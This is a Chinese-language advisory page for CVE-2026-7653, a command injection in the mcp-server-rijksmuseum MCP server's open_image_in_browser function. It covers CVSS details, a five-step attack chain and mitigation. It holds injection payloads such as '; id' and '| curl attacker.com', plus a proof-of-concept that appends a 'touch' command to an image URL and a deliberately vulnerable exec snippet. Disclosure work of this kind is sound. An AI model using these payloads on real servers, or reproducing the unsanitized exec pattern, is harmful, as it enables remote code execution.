IPBUF安全漏洞报告
English
CVE-2026-7653 CVSS 6.3 中危

CVE-2026-7653: mcp-server-rijksmuseum命令注入漏洞

披露日期: 2026-05-02
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-7653
漏洞类型
操作系统命令注入
CVSS评分
6.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
r-huijts mcp-server-rijksmuseum

相关标签

OS Command InjectionRCEMCPNode.jsCVE-2026-7653mcp-server-rijksmuseum

漏洞概述

r-huijts开发的mcp-server-rijksmuseum组件在版本1.0.4及之前存在严重的安全缺陷。该漏洞源于src/index.ts文件中open_image_in_browser函数对imageUrl参数的处理不当,未能有效过滤特殊字符,导致攻击者可构造恶意输入实施操作系统命令注入。由于该组件主要用于MCP接口交互,攻击者可能利用此漏洞在服务器端远程执行任意系统命令,造成数据泄露、系统损坏或服务中断。目前官方已获知该问题但尚未发布修复补丁,且利用代码已公开,风险正在增加。

技术细节

该漏洞属于典型的OS命令注入(CWE-78)。在受影响的版本中,open_image_in_browser函数接收用户提供的imageUrl参数,并将其直接传递给底层的系统命令执行环境(如Node.js的child_process.exec),而未进行严格的输入验证或转义。攻击者可以利用Shell元字符(如分号;、管道符|、命令替换$()等)截断原始命令并拼接恶意指令。根据CVSS向量(AV:N/AC:L/PR:L/UI:N/S:U),攻击者需要低权限(PR:L)即可通过网络发起无需交互的攻击。一旦利用成功,攻击者将获得应用程序运行上下文的系统权限,能够读取敏感文件、安装后门甚至完全控制受影响的主机。

攻击链分析

STEP 1
侦察
攻击者识别目标正在运行r-huijts/mcp-server-rijksmuseum组件,且版本低于或等于1.0.4。
STEP 2
访问与交互
攻击者获取MCP接口的低权限访问(PR:L),与服务器建立连接并枚举可用的工具函数。
STEP 3
漏洞利用
攻击者调用open_image_in_browser函数,并在imageUrl参数中注入包含Shell元字符的恶意载荷(如`; id`或`| curl attacker.com`)。
STEP 4
命令执行
服务器端未经过滤直接将参数传递给系统Shell执行,导致攻击者的恶意命令在服务器上运行。
STEP 5
后渗透
利用获得的Shell权限,攻击者可能窃取数据、横向移动或部署持久化后门。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
// Conceptual PoC for CVE-2026-7653 // The vulnerable function 'open_image_in_browser' takes an 'imageUrl' argument // and passes it unsanitized to a system command (e.g., `open` or `xdg-open`). // Malicious payload construction to inject commands // Example: Request to open an image, followed by a command to create a file const payload = "http://example.com/image.jpg; touch /tmp/pwned_by_cve_2026_7653"; // In a real attack scenario, this payload would be sent to the MCP server // via the 'open_image_in_browser' tool call. // Simulated vulnerable code snippet (src/index.ts): /* import { exec } from 'child_process'; function open_image_in_browser(imageUrl: string) { // VULNERABLE: imageUrl is directly interpolated into the command string const command = `open ${imageUrl}`; exec(command, (error, stdout, stderr) => { if (error) { console.error(`exec error: ${error}`); return; } console.log(`Output: ${stdout}`); }); } // Triggering the exploit open_image_in_browser(payload); */ // Result: The system executes "open http://example.com/image.jpg" and then "touch /tmp/pwned_by_cve_2026_7653"

影响范围

r-huijts mcp-server-rijksmuseum <= 1.0.4

防御指南

临时缓解措施
建议立即限制对MCP服务器的网络访问权限,并在应用防火墙(WAF)层面拦截包含常见Shell注入特征(如;, |, &, $, `)的请求流量,直到官方补丁发布并应用。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表